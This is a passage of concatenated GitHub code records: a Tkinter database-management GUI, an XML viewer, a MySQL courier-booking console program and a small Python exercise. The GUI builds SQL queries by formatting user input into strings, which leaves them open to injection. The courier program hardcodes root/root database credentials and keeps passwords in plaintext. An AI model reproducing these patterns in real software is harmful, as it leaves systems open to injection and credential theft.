table_list[subindex], item_text[0]))\n                    print('DEBUG:: Delete row with condition {}'.format(item_text[0]))\n                refresh_table()\n            except:\n                messagebox.showerror(\"Error\", \"Error while deleting rows\")\n\n    \n        def add_data_to_rows():\n            try:\n                def add_data_to_db():\n                    for item in range(len(text_variables)):\n                        if not text_variables[item].get():\n
                            messagebox.showerror(\"Error\", \"The input field is empty - {}\".format(headings[item]))\n                            return\n                    try:\n                        query_condition = ','.join(\"'''{}'''\".format(i.get()) for i in text_variables)\n                        cursor.execute(\"select insert_rows('{}','{}',array[{}])\".format(db_list[index], table_list[subindex], query_condition))\n                        #print(\"DEBUG:: query is {}\".format(query_condition))\n                        refresh_table()\n                        add_window.destroy()\n                    except:\n                        messagebox.showerror(\"Error\", \"Error while adding rows\")\n                \n                if table_list[subindex] == 'finances':\n                    messagebox.showerror(\"Error\", \"No rights to add data to this table ({})\".format(table_list[subindex]))\n                    return\n\n                # Window setup\n                add_window = Toplevel(table_window)\n                add_window.title('{}'.format(table_list[subindex]))\n                add_window.geometry('300x350')\n                add_window.iconbitmap('Python-icon.ico')\n\n                # Entry\n                entry_list = list()\n                text_variables = list()\n                labels_list = list()\n                for item in range(len(headings)):\n                    text_variables.append(StringVar())\n                    entry_list.append(Entry(add_window, textvariable=text_variables[item]))\n                    labels_list.append(Label(add_window, text='{} ({})'.format(headings[item], types[item])))\n\n                # Buttons\n                add_current_data = Button(add_window, text='Add data', command=add_data_to_db)\n\n                # Places\n                place_under_entry = len(entry_list)\n                for item in range(len(entry_list)):\n                    labels_list[item].grid(column=0, row=item, pady=5)\n                    entry_list[item].grid(column=1, row=item, pady=5)\n                add_current_data.grid(column=1, row=place_under_entry, pady=5)\n\n                add_window.columnconfigure(0, weight=1)\n                add_window.columnconfigure(1, weight=1)\n                #add_window.rowconfigure(0, weight=1)\n            except:\n                show_error(\"Error while opening table '{}'\".format(table_list[subindex]), add_window)\n\n\n        def update_data_in_rows():\n            try:\n                def update_data_in_db():\n                    for item in range(1, len(text_variables)):\n                        if not text_variables[item].get():\n                            messagebox.showerror(\"Error\", \"The input field is empty - {}\".format(headings[item]))\n                            return\n                    query_condition = ','.join(\"'{}'\".format(text_variables[i].get()) for i in range(1, len(text_variables)))\n                    cursor.execute(\"select update_rows('{}','{}','{}',array[{}])\".format(db_list[index], table_list[subindex], data[0], query_condition))\n                    #print(\"DEBUG:: query is {}\".format(query_condition))\n                    refresh_table()\n                    update_window.destroy()\n                \n                if table_list[subindex] == 'finances':\n                    messagebox.showerror(\"Error\", \"No rights to update data in this table ({})\".format(table_list[subindex]))\n                    return\n                \n                # Window setup\n                update_window = Toplevel(table_window)\n                update_window.title('{}'.format(table_list[subindex]))\n                update_window.geometry('300x350')\n                update_window.iconbitmap('Python-icon.ico')\n\n                # Entry\n                data = table.item(table.selection()[0])['values']\n                entry_list = list()\n                text_variables = list()\n                labels_list = list()\n                for item in range(len(headings)):\n                    text_variables.append(StringVar(update_window, data[item]))\n                    entry_list.append(Entry(update_window, textvariable=text_variables[item]))\n                    labels_list.append(Label(update_window, text='{} ({})'.format(headings[item], types[item])))\n\n                # Buttons\n                add_current_data = Button(update_window, text='Update data', command=update_data_in_db)\n\n                # Places\n                place_under_entry = (len(entry_list) - 1)\n                for item in range(1, len(entry_list)):\n                    labels_list[item].grid(column=0, row=item-1, pady=5)\n                    entry_list[item].grid(column=1, row=item-1, pady=5)\n                add_current_data.grid(column=1, row=place_under_entry, pady=5)\n\n                update_window.columnconfigure(0, weight=1)\n                
update_window.columnconfigure(1, weight=1)\n #add_window.rowconfigure(0, weight=1)\n except IndexError:\n messagebox.showerror(\"Error\", \"No items selected\")\n except:\n show_error(\"Error while opening table '{}'\".format(table_list[subindex]), update_window)\n\n\n try:\n # Window setup\n subindex = table_listbox.curselection()[0]\n table_window = Toplevel(details_window)\n table_window.title('{}'.format(table_list[subindex]))\n table_window.geometry('700x600')\n table_window.iconbitmap('Python-icon.ico')\n\n # Headings\n headings = list()\n types = list()\n if table_list[subindex] == 'projects':\n headings = ['project_ID', 'project_category', 'project_name', 'project_dev', 'project_release_date', 'project_cost']\n types = ['integer', 'varchar', 'text', 'varchar', 'date', 'integer']\n else:\n for item in cursor.execute(\"select * from show_table_data('{}','{}')\".format(db_list[index], table_list[subindex])):\n headings.append(item[0])\n types.append(item[1])\n \n # Rows\n rows = list()\n for item in cursor.execute(\"select * from get_{}('{}','')\".format(table_list[subindex], db_list[index])):\n rows.append(item)\n\n # Tree frame\n tree_frame = Frame(table_window)\n\n # Treeview\n table = ttk.Treeview(master=tree_frame, show=\"headings\", selectmode=\"extended\", height=200)\n\n # Scroll\n horScroll = ttk.Scrollbar(tree_frame)\n horScroll.configure(command=table.xview, orient=HORIZONTAL)\n \n # Treeview setup\n table.configure(xscrollcommand=horScroll.set)\n table[\"columns\"] = headings\n table[\"displaycolumns\"] = headings\n for head in headings:\n table.heading(head, text=head, anchor=CENTER)\n table.column(head, anchor=CENTER)\n for row in rows:\n table.insert('', END, values=tuple(row))\n\n # Buttons\n search_button = Button(tree_frame, text='Search', command=search_in_table)\n add_data = Button(tree_frame, text='Add data', command=add_data_to_rows)\n delete_data = Button(tree_frame, text='Delete data', command=delete_rows)\n update_data = Button(tree_frame, text='Update data', command=update_data_in_rows)\n\n # Entry\n search_item = StringVar()\n search_enter = ttk.Entry(tree_frame, width=40)\n if table_list[subindex] == 'divisions':\n search_item.set('division_name')\n elif table_list[subindex] == 'positions':\n search_item.set('position_name')\n elif table_list[subindex] == 'buildings':\n search_item.set('address')\n elif table_list[subindex] == 'employees':\n search_item.set('employee_nam')\n elif table_list[subindex] == 'clients':\n search_item.set('client_name')\n elif table_list[subindex] == 'categories':\n search_item.set('category_name')\n elif table_list[subindex] == 'projects':\n search_item.set('project_name')\n elif table_list[subindex] == 'sales':\n search_item.set('sale_ID')\n elif table_list[subindex] == 'finances':\n search_item.set('fiscal_year')\n else: \n search_item.set('unknown')\n search_enter.config(textvariable=search_item)\n\n # Places\n tree_frame.grid(column=0, row=0, sticky=N, pady=25)\n table.grid(column=0, row=0, columnspan=3, rowspan=2, sticky=N)\n horScroll.grid(column=0, row=3, columnspan=3, sticky=W + E)\n search_enter.grid(column=1, row=4, sticky=N, pady=12.5, ipadx=0)\n search_button.grid(column=1, row=5, sticky=N, pady=5, ipadx=0)\n add_data.grid(column=1, row=6, sticky=N, pady=5, ipadx=0)\n delete_data.grid(column=1, row=7, sticky=N, pady=5, ipadx=0)\n update_data.grid(column=1, row=8, sticky=N, pady=5, ipadx=0)\n\n table_window.columnconfigure(0, weight=1)\n table_window.rowconfigure(0, weight=1)\n tree_frame.columnconfigure(0, weight=1)\n 
tree_frame.columnconfigure(1, weight=1)\n        tree_frame.columnconfigure(2, weight=1)\n        tree_frame.columnconfigure(3, weight=1)\n        tree_frame.columnconfigure(4, weight=1)\n        tree_frame.rowconfigure(1, weight=1)\n    except IndexError:\n        messagebox.showerror(\"Error\", \"No items selected\")\n    except:\n        show_error(\"Error while opening database '{}'\".format(db_list[index]), details_window)\n\n\n    def clear_table():\n        try:\n            subindex = table_listbox.curselection()[0]\n            if table_list[subindex] == 'finances':\n                messagebox.showerror(\"Error\", \"Auto-filled table, you do not have permission to clear\")\n                return\n            query = '''select clear_table('{}', '{}')'''.format(db_list[index], table_list[subindex])\n            cursor.execute(query)\n        except IndexError:\n            messagebox.showerror(\"Error\", \"No items selected\")\n        else:\n            messagebox.showinfo(\"Success\", \"Table '{}' from database '{}' was cleaned up successfully\".format(table_list[subindex], db_list[index]))\n            print(\"DEBUG:: Clear all rows table '{}' in database with name - {}\".format(table_list[subindex], db_list[index]))\n\n    \n    try:\n        index = db_listbox.curselection()[0]\n        if index == 0:\n            messagebox.showerror(\"Error\", \"No rights to view the database\")\n            return\n        details_window = Toplevel(root)\n        details_window.title('{}'.format(db_list[index]))\n        details_window.geometry('400x250')\n        details_window.iconbitmap('Python-icon.ico')\n\n        # ListBox\n        table_listbox = Listbox(details_window)\n        table_list = list()\n        for item in cursor.execute(\"select * from show_tables('{}');\".format(db_list[index])):\n            table_list.append(item[0])\n        for item in table_list:\n            table_listbox.insert(END, item)\n        #table_listbox.bind('<>', on_change)\n    except IndexError:\n        messagebox.showerror(\"Error\", \"No items selected\")\n    except:\n        show_error(\"Error while opening database '{}'\".format(db_list[index]), details_window)\n\n\n    # Buttons\n    open_tbl = Button(details_window, text='Open table', command=open_table)\n    clear_tbl = Button(details_window, text='Clear table', command=clear_table)\n    #search_in = Button(details_window, text='Search in')\n    #alter_tuple = Button(details_window, text='Alter tuple')\n\n    # Places\n    table_listbox.place(anchor=N, x=150, y=25)\n    open_tbl.place(anchor=NW, x=250, y=25)\n    clear_tbl.place(anchor=NW, x=250, y=55)\n    #search_in.place(anchor=NW, x=250, y=85)\n\n\ndef clear_all_tables():\n    try:\n        index = db_listbox.curselection()[0]\n        if index == 0:\n            messagebox.showerror(\"Error\", \"Unable to clear 'mother' database\")\n            return\n        query = '''select clear_all_table('{}')'''.format(db_list[index])\n        cursor.execute(query)\n    except IndexError:\n        messagebox.showerror(\"Error\", \"No items selected\")\n    else:\n        messagebox.showinfo(\"Success\", \"'{}' database was cleaned up successfully\".format(db_list[index]))\n        print(\"DEBUG:: Clear all rows from all tables in database with name - {}\".format(db_list[index]))\n\n\ncreate_db = Button(text='Create database', command=create_database)\nselect_db = Button(text='Select database', command=select_database)\ndelete_db = Button(text='Delete database', command=delete_database)\ndetail_db = Button(text='Details', command=details)\nclear_db = Button(text='Clear database', command=clear_all_tables)\n\n\ndb_listbox.place(anchor=N, x=150, y=25)\ncreate_db.place(anchor=NW, x=250, y=25)\n# select_db.place(anchor=NW, x=250, y=55)\ndelete_db.place(anchor=NW, x=250, y=55)\ndetail_db.place(anchor=NW, x=250, y=85)\nclear_db.place(anchor=NW, x=250, 
y=115)\n\n\nroot.mainloop()\n","repo_name":"dsawfer/SQL-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22048398078","text":"\"\"\"\nXMLView GUI-independent code\n\"\"\"\n\nimport os\n# import pathlib\n## import sys\nimport shutil\nimport xml.etree.ElementTree as et\n# import logging\n\nfrom .shared import ELSTART, log\nfrom .base import find_in_flattened_tree, parse_nsmap\nfrom .gui import Gui\nTITEL = \"Albert's (Simple) XML viewer\"\n# NEW_ROOT = '(new root)'\n\n\nclass Viewer():\n    \"Application window, without GUI-specific methods\"\n    def __init__(self, fname):\n        self.title = \"Albert's XML Viewer\"\n        self.xmlfn = os.path.abspath(fname) if fname else ''\n        self.gui = Gui(self, fname, readonly=True)\n        self.search_args = []\n        self._search_pos = None\n        self.gui.init_gui()\n        if self.xmlfn:\n            try:\n                tree, prefixes, uris = parse_nsmap(self.xmlfn)\n            except (IOError, et.ParseError) as err:\n                self.gui.meldfout(str(err), abort=True)\n                self.init_tree(None)\n                return # None\n            else:\n                self.init_tree(tree.getroot(), prefixes, uris)\n        self.gui.go()\n\n    def check_tree(self):\n        \"needed because the gui module calls this\"\n        return True\n\n    def get_menu_data(self):\n        \"\"\"return menu structure for GUI (title, callback, keyboard shortcut(s))\n        \"\"\"\n        return (((\"&Open\", self.openxml, 'Ctrl+O'),\n                 ('E&xit', self.gui.quit, 'Ctrl+Q'), ),\n                ((\"&Expand All (sub)Levels\", self.expand, 'Ctrl++'),\n                 (\"&Collapse All (sub)Levels\", self.collapse, 'Ctrl+-'), ),\n                ((\"&Find\", self.search, 'Ctrl+F'),\n                 (\"Find &Last\", self.search_last, 'Shift+Ctrl+F'),\n                 (\"Find &Next\", self.search_next, 'F3'),\n                 (\"Find &Previous\", self.search_prev, 'Shift+F3')))\n\n    def init_tree(self, root, prefixes=None, uris=None, name=''):\n        \"set up display tree\"\n        def add_to_tree(el, rt):\n            \"recursively add elements\"\n            rr = self.add_item(rt, el.tag, el.text)\n            ## log(calculate_location(self, rr))\n            for attr in el.keys():\n                h = el.get(attr)\n                if not h:\n                    h = '\"\"'\n                self.add_item(rr, attr, h, attr=True)\n            for subel in list(el):\n                add_to_tree(subel, rr)\n        if name:\n            titel = name\n        elif self.xmlfn:\n            titel = self.xmlfn\n        else:\n            titel = '[unsaved file]'\n        self.top = self.gui.setup_new_tree(titel)\n        self.rt = root\n        self.ns_prefixes = prefixes or []\n        self.ns_uris = uris or []\n        self.gui.set_windowtitle(\" - \".join((os.path.basename(titel), TITEL)))\n        if root is None: # explicit test needed, empty root element is falsey\n            return\n        # add namespaces, if any\n        namespaces = False\n        for ix, prf in enumerate(self.ns_prefixes):\n            if not namespaces:\n                ns_root = self.gui.add_node_to_parent(self.top)\n                self.gui.set_node_title(ns_root, 'namespaces')\n                # ns_root = qtw.QTreeWidgetItem(['namespaces'])\n                namespaces = True\n            ns_item = self.gui.add_node_to_parent(ns_root)\n            self.gui.set_node_title(ns_item, '{}: {}'.format(prf, self.ns_uris[ix]))\n        rt = self.add_item(self.top, self.rt.tag, self.rt.text)\n        for attr in self.rt.keys():\n            h = self.rt.get(attr)\n            if not h:\n                h = '\"\"'\n            self.add_item(rt, attr, h, attr=True)\n        for el in list(self.rt):\n            add_to_tree(el, rt)\n        # self.tree.selection = self.top\n        # set_selection()\n        self.replaced = {} # dict of nodes that have been replaced while editing\n        self.gui.expand_item(self.top)\n\n    def getshortname(self, data, attr=False):\n        \"\"\"build and return a name for this node\n        \"\"\"\n        fullname, value = data\n        text = ''\n        if attr:\n            text = 
value.rstrip('\\n')\n        elif value:\n            text = value.split(\"\\n\", 1)[0]\n        max = 60\n        if len(text) > max:\n            text = text[:max].lstrip() + '...'\n        if fullname.startswith('{'):\n            uri, localname = fullname[1:].split('}')\n            for i, ns_uri in enumerate(self.ns_uris):\n                if ns_uri == uri:\n                    prefix = self.ns_prefixes[i]\n                    break\n            fullname = ':'.join((prefix, localname))\n        strt = ' '.join((ELSTART, fullname))\n        if attr:\n            return \" = \".join((fullname, text))\n        elif text:\n            return \": \".join((strt, text))\n        return strt\n\n    def add_item(self, to_item, name, value, before=False, below=True, attr=False):\n        \"\"\"execute adding of item\"\"\"\n        log('in add_item for {} value {} to {} before is {} below is {}'.format(\n            name, value, to_item, before, below))\n        if value is None:\n            value = \"\"\n        itemtext = self.getshortname((name, value), attr)\n        if below:\n            add_under = to_item\n            insert = -1\n            if not itemtext.startswith(ELSTART):\n                itemlist = self.gui.get_node_children(to_item)\n                for seq, subitem in enumerate(itemlist):\n                    if self.gui.get_node_title(subitem).startswith(ELSTART):\n                        break\n                if itemlist and seq < len(itemlist):\n                    insert = seq\n            else:\n                add_under, insert = self.gui.get_node_parentpos(to_item)\n                print('in base.add_item (not below), insert is', insert)\n                if not before:\n                    insert += 1\n                print('in base.add_item after correction, insert is', insert)\n        item = self.gui.add_node_to_parent(add_under, insert)\n        self.gui.set_node_title(item, itemtext)\n        self.gui.set_node_data(item, name, value)\n        return item\n\n    def flatten_tree(self, element):\n        \"\"\"return the tree's structure as a flat list\n        probably nicer as a generator function\n        \"\"\"\n        attr_list = []\n        # print('in flatten tree: node title', self.gui.get_node_title(element))\n        # print('in flatten tree: node data', self.gui.get_node_data(element))\n        try:\n            title, data = self.gui.get_node_data(element)\n        except TypeError:\n            title = data = ''\n        if not data:\n            data = ('', '')\n        elem_list = [(element, title, data, attr_list)]\n\n        subel_list = []\n        for subel in self.gui.get_node_children(element):\n            if self.gui.get_node_title(subel).startswith(ELSTART):\n                subel_list = self.flatten_tree(subel)\n                elem_list.extend(subel_list)\n            else:\n                # attr_list.append((subel, *self.gui.get_node_data(subel)))\n                x, y = self.gui.get_node_data(subel)\n                attr_list.append((subel, x, y))\n        # for item in elem_list:\n        #     print(item)\n        return elem_list\n\n    def find_first(self, reverse=False):\n        \"start search after asking for options\"\n        # from_contextmenu = self.checkselection(message=False)\n        if self.gui.get_search_args():\n            # TODO: for the context-menu case, take the current item's position into account\n            # if from_contextmenu:\n            self.item = self.gui.get_selected_item() # self.tree.Selection\n            self._search_pos = self.item, None\n            self.find_next(reverse)\n\n    def find_next(self, reverse=False):\n        \"find (default is forward)\"\n        if self._search_pos is None:\n            self.gui.meldinfo('You need to \"Find\" something first')\n            return\n        found, is_attr = find_in_flattened_tree(self.flatten_tree(self.top), self.search_args,\n                                                reverse, self._search_pos)\n        if found:\n            self.gui.set_selected_item(found)\n            self._search_pos = (found, is_attr)\n        else:\n            self.gui.meldinfo('Nothing (more) found')\n\n    def openxml(self, event=None):\n        \"load XML file (after checking if current needs to be saved)\"\n        ok, fname = self.gui.file_to_read()\n        if ok:\n            try:\n                tree, prefixes, uris = parse_nsmap(fname)\n            except et.ParseError as e:\n                self.gui.meldfout(str(e))\n            else:\n                self.xmlfn = fname\n                self.init_tree(tree.getroot(), prefixes, 
uris)\n\n def expand(self, event=None):\n \"\"\"show all children of the current node\n \"\"\"\n self.gui.expand_item()\n\n def collapse(self, event=None):\n \"\"\"hide all children of the current node\n \"\"\"\n self.gui.collapse_item()\n\n def search(self, event=None):\n \"start forward search\"\n self.find_first()\n\n def search_last(self, event=None):\n \"start backwards search\"\n self.find_first(reverse=True)\n\n def search_next(self, event=None):\n \"find forward\"\n self.find_next()\n\n def search_prev(self, event=None):\n \"find backwards\"\n self.find_next(reverse=True)\n\n @staticmethod\n def get_search_text(ele, attr_name, attr_val, text):\n \"build text describing search arguments\"\n attr = attr_name or attr_val\n out = ['search for'] if any((ele, attr, text)) else ['']\n has_text = ' that has'\n name_text = ' a name'\n value_text = ' a value'\n contain_text = ' containing `{}`'\n if ele:\n ele_out = [' an element' + has_text + name_text, contain_text.format(ele)]\n if attr:\n attr_out = [' an attribute' + has_text]\n if attr_name:\n attr_out[0] += name_text\n attr_out.append(contain_text.format(attr_name))\n if attr_val:\n if not attr_name:\n attr_out[0] += value_text\n else:\n attr_out.append(' and' + value_text)\n attr_out.append(contain_text.format(attr_val))\n if ele:\n attr_out[0] = ' with' + attr_out[0]\n if text:\n out[0] += ' text'\n out.append(' `{}`'.format(text))\n if ele:\n ele_out[0] = ' under' + ele_out[0]\n out += ele_out\n elif attr:\n out += [' under an element with']\n if attr:\n out += attr_out\n elif ele:\n out += ele_out\n if attr:\n out += attr_out\n elif attr:\n attr_out[0] = out[0] + attr_out[0]\n out = attr_out\n return out\n\n def about(self, event=None):\n \"Credits\"\n self.gui.meldinfo(\"Started in 2008 by Albert Visser\\nWritten in Python\")\n","repo_name":"albertvisser/axe","sub_path":"axe/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":10739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32212533400","text":"import mysql.connector\n\nimport datetime # To get the current date and time\n\n# con: The primary connection to the existing up and running MySQL server.\n# cur: The primary cursor used to interact with the MySQL server.\nCon = mysql.connector.connect(user='root', password='root', database='courier', host='localhost')\nif not Con.is_connected():\n print(\"Error connecting to MySQL database! 
Please check your environment setup.\")\nCur = Con.cursor()\n\n# CourierCount: Used to track the count of the number of couriers and assign IDs automatically.\n# Initial value is the count of the couriers in the database.\n\nCourierCount = 0\n\ndef setup():\n    TABLE_BUILD_CMDS = [\n        # Users table\n        \"CREATE TABLE users(Username CHAR(30) PRIMARY KEY, Password CHAR(30))\",\n\n        # Couriers table\n        \"CREATE TABLE couriers(CourierID CHAR(5) PRIMARY KEY, CustomerID CHAR(30) NOT NULL,\"\\\n        \"FromLoc TEXT, ToLoc TEXT,\"\\\n        \"ServiceTier CHAR(10), RequestDate DATE, FOREIGN KEY(CustomerID) REFERENCES users(Username))\"\n    ]\n    for cmd in TABLE_BUILD_CMDS:\n        try:\n            Cur.execute(cmd)\n        except mysql.connector.Error as err:\n            print(err.msg)\n            pass\n    Con.commit()\n\n    global CourierCount\n    Cur.execute(\"SELECT COUNT(*) FROM couriers;\")\n    CourierCount = int(Cur.fetchone()[0])\n\ndef cleanup():\n    TABLE_DESTROY_CMDS = [\n        \"DROP TABLE couriers;\",\n        \"DROP TABLE users;\",\n    ]\n    for CMD in TABLE_DESTROY_CMDS:\n        try:\n            Cur.execute(CMD)\n        except mysql.connector.Error:\n            pass\n    Con.commit()\n\ndef rebuild():\n    if input(\"Rebuilding the database destroys all the tables and rebuilds them.\\n\"\n             \"If the data stored is not backed up, loss of data is imminent.\\n\"\n             \"Do you still wish to continue? (yes/no): \").strip().lower() == \"yes\":\n        cleanup()\n        setup()\n\ndef _getUsers():\n    Cur.execute(\"SELECT * FROM users\")\n    return Cur.fetchall()\n\ndef signUp():\n    while True:\n        print('-'*30)\n        print(\"SIGNUP\")\n        username = input(\"Enter your username: \").strip()\n        password = input(\"Enter your password: \").strip()\n        # fix: the old inner loop's `continue` only advanced the for-loop, so duplicate usernames were inserted anyway\n        if any(user[0] == username for user in _getUsers()):\n            print(\"Username already taken! Please enter a different username and try again!\")\n            continue\n        Cur.execute(\"INSERT INTO users VALUES(%s, %s)\", (username, password))\n        break\n    Con.commit()\n\nLoginInformation = None\n\ndef login():\n    username = input(\"Enter your username: \").strip()\n    password = input(\"Enter your password: \").strip()\n    Cur.execute(\"SELECT Username FROM users WHERE Username=%s AND Password=%s\", (username, password))\n    if Cur.fetchall() == []:\n        print(\"Invalid username/password combo!\")\n    else:\n        global LoginInformation\n        print(\"Successfully logged in as\", username, \"!\")\n        LoginInformation = {\"Username\": username, \"Password\": password}\n\ndef sendCourier():\n    global LoginInformation, CourierCount\n    if LoginInformation is None:\n        print(\"You need to login before sending a courier! Please login!\")\n        return\n    print(\"Sending courier as\", LoginInformation[\"Username\"])\n    fromLoc = input(\"Enter from location: \")\n    toLoc = input(\"Enter to location: \")\n    requestDate = datetime.date.today().isoformat()\n    print(\"Enter the service tier you would like to opt:\"\\\n          \" 1) Standard - Basic courier service with International shipping.\",\\\n          \" 2) Prime - Faster delivery ( + INR 1500.00 )\",\\\n          \" 3) PrimePlus - Fastest delivery and 5% off of your next 3 couriers! ( + INR 2500.00 )\", sep=\"\\n\")\n    serviceTierChoice = int(input(\"Enter your choice: \").strip())\n    serviceTier = None\n
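    # [Added note] a mapping lookup, e.g. serviceTier = {1: \"Standard\", 2: \"Prime\", 3: \"PrimePlus\"}.get(serviceTierChoice),\n    # would replace the if/elif chain below -- an alternative sketch, not the original author's code.\n    if serviceTierChoice == 1:\n        serviceTier = \"Standard\"\n    elif serviceTierChoice == 2:\n        serviceTier = \"Prime\"\n    elif serviceTierChoice == 3:\n        serviceTier = \"PrimePlus\"\n    else:\n        print(\"Invalid service tier choice\", serviceTierChoice, \"! 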
Cancelling last request!\")\n        return\n    print(\"Selecting service tier\", serviceTier)\n    CourierCount += 1\n    courierId = CourierCount\n    Cur.execute(\"INSERT INTO couriers VALUES(%s, %s, %s, %s, %s, %s)\", \\\n                (courierId, LoginInformation[\"Username\"], fromLoc, toLoc, serviceTier, requestDate))\n    print(\"Successfully sent courier! Your courier ID is\", courierId)\n    Con.commit()\n\ndef _getAllCouriers():\n    global LoginInformation\n    Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s;\", (LoginInformation[\"Username\"],))\n    couriers = Cur.fetchall()\n    if couriers == []:\n        print(\"You haven't sent out any couriers yet. Try sending one now! :D\")\n    return couriers\n\ndef printCouriers(couriers):\n    if couriers == []:\n        return\n    print('-' * 67)\n    print(\"| {} | {} | {} | {} | {} |\".format(\\\n        \"SlNo\".rjust(4), \"From\".rjust(10), \"To\".rjust(10), \\\n        \"Date of Sending\", \"Service Tier\"))\n    print('-' * 67)\n    for courier in couriers:\n        print(\"| {} | {} | {} | {} | {} |\".\\\n            format(courier[0].rjust(4), \\\n            courier[2].rjust(10), courier[3].rjust(10), \\\n            str(courier[5]).rjust(15), courier[4].rjust(12)))\n    print('-' * 67)\n\n\ndef trackCourier():\n    courierId = int(input(\"Enter your courier ID: \").strip())\n    Cur.execute(\"SELECT * FROM couriers WHERE CourierID=%s\", (courierId,))\n    dat = Cur.fetchone()\n    # fix: fetchone() returns None (not an empty tuple) when no row matches\n    if dat is None:\n        print(\"No courier with the given ID!\")\n    else:\n        global LoginInformation\n        if dat[1] != LoginInformation[\"Username\"]:\n            print(\"Mismatch between currently logged in user and the user who sent the courier!\",\n                  \"Please login as the user who sent the courier to track it!\")\n        else:\n            print((\"Courier ID: {}\\nService Tier: {}\\nFrom location: \" +\\\n                   \"{}\\nTo location: {}\\nDate of sending: {}\")\\\n                  .format(dat[0], dat[4], dat[2], dat[3], dat[5]))\n\ndef searchCourier():\n    global LoginInformation\n    couriers = []\n
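    # [Editor's note, added] the LIKE patterns below are bound without % wildcards, so they behave\n    # like exact matches; binding '%' + term + '%' would give substring search (an observation and\n    # sketch only, not a change to the original queries).\n    choice = int(input(\"Would you like to search by\"+\\\n                       \"(1) from location or (2) to location? 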
(1/2): \"))\n if choice == 1:\n fromLoc = input(\"Enter from location: \").strip()\n Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s\"\\\n \"AND FromLoc LIKE %s\",\\\n (LoginInformation[\"Username\"], fromLoc))\n couriers = Cur.fetchall()\n elif choice == 2:\n toLoc = input(\"Enter to location: \").strip()\n Cur.execute(\"SELECT * FROM couriers WHERE CustomerID=%s\"\\\n \"AND ToLoc LIKE %s\", \\\n (LoginInformation[\"Username\"], toLoc))\n couriers = Cur.fetchall()\n else:\n return\n if couriers == []:\n print(\"Search results empty :(\")\n else:\n printCouriers(couriers)\n\ndef manageCouriers():\n if LoginInformation == None:\n print(\"You need to login in order manage your couriers!\")\n return\n while True:\n print('#' * 25)\n print(\"Manage your couriers\")\n print(\" 1) View all your couriers\")\n print(\" 2) Track a courier\")\n print(\" 3) Search courier by from or to location\")\n print(\" *) Go back\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n printCouriers(_getAllCouriers())\n elif choice == 2:\n trackCourier()\n elif choice == 3:\n searchCourier()\n else:\n break\n\n#################### Main logic ####################\n\nsetup()\n\nwhile True:\n print('\\n', ('#' * 30))\n print(\"Welcome to control panel!\")\n print(\" 1) Sign up\")\n print(\" 2) Log in\")\n print(\" 3) Send a courier\")\n print(\" 4) Manage your couriers\")\n print(\" 5) Admin tools: Rebuild the database\")\n print(\" *) Exit\")\n choice = int(input(\"Enter your choice: \"))\n if choice == 1:\n signUp()\n elif choice == 2:\n login()\n elif choice == 3:\n sendCourier()\n elif choice == 4:\n manageCouriers()\n elif choice == 5:\n rebuild()\n else:\n break\n\nCon.close()\n \n####################################################\n","repo_name":"dotslashinit-sh/CS-Courier-System","sub_path":"courier.py","file_name":"courier.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15532755311","text":"iterations = int(input())\nbest_result = 0\nwinning_snow = 0\nwinning_time = 0\nwinning_quality = 0\nfor ball in range(1, iterations + 1):\n snowball_snow = int(input())\n snowball_time = int(input())\n snowball_quality = int(input())\n formula = (snowball_snow / snowball_time) ** snowball_quality\n if formula > best_result:\n best_result = formula\n winning_snow = snowball_snow\n winning_time = snowball_time\n winning_quality = snowball_quality\nprint(f\"{winning_snow} : {winning_time} = {best_result:.0f} ({winning_quality})\")\n","repo_name":"karalkal/SoftUni_Python_Fundamentals","sub_path":"02_Data_Types_and_Variables/2_exercises/ex9_snowballs.py","file_name":"ex9_snowballs.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72282136164","text":"import os\nimport sys\nimport gc\nimport cv2\nimport numpy\nimport pandas\nfrom tensorflow import keras\nfrom keras.models import load_model\n\nsys.path.append(os.path.abspath('../lib'))\nimport imageDraw\nimport imageProcess\n\n############################################################\n# GENERATE A BIGGER TRAINING DATASET FOR IMROVED ML MODEL\n# THE CLASSIFICATION WILL BE DONE USING THE ALREADY TRAINED MODEL\n# FIND OUT IF THE PILLAR IS COLLAPSED USING EXISTING ML MODEL\n############################################################\n# excelFileName = 'classifyPillars.xlsx'\n# sheetNameList = ['trainingData']\n# model = 
keras.models.load_model('../model/model_01_intermediate_487_accuracy_trainAcc_99.94_testAcc_99.85.h5')\n\n# for sheetName in sheetNameList:\n # print('Processing %s sheet' %(sheetName))\n # df = pandas.read_excel(excelFileName,sheet_name=sheetName,names=['inputFile','colTopLeft','rowTopLeft','colTopRight','rowTopRight','colBottomRight','rowBottomRight','colBottomLeft','rowBottomLeft','numPillarsInRow','numPillarsInCol'],inplace=True)\n \n # outFile = open(sheetName+'.dat','w')\n # outFile.write('InputFile\\tTag\\tPillarID\\tCropStartRow\\tCropStartCol\\tCropEndRow\\tCropEndCol\\tClassificationClass\\tClassificationClassLabel\\n')\n # for inputFile,colTopLeft,rowTopLeft,colTopRight,rowTopRight,colBottomRight,rowBottomRight,colBottomLeft,rowBottomLeft,numPillarsInRow,numPillarsInCol in df.values:\n # cropSize = int(round(max(2.0*0.75*(colTopRight-colTopLeft)/(numPillarsInRow-1),2.0*0.75*(rowBottomLeft-rowTopLeft)/(numPillarsInCol-1))))\n # if ('.dm3' in inputFile):\n # outputFile = inputFile.replace('.dm3','.png')\n # elif ('.dm4' in inputFile):\n # outputFile = inputFile.replace('.dm4','.png')\n # print('Processing %s' %(inputFile))\n # tag = inputFile.split('/')[-2]\n \n # gImg = imageProcess.readDM4(inputFile)\n # [row,col] = gImg.shape\n # gImgNorm = imageProcess.normalize(gImg,min=30,max=230)\n \n # topRowPillarCentre = numpy.column_stack((\\\n # numpy.linspace(rowTopLeft,rowTopRight,numPillarsInRow),\\\n # numpy.linspace(colTopLeft,colTopRight,numPillarsInRow)))\n # bottomRowPillarCenter = numpy.column_stack((\\\n # 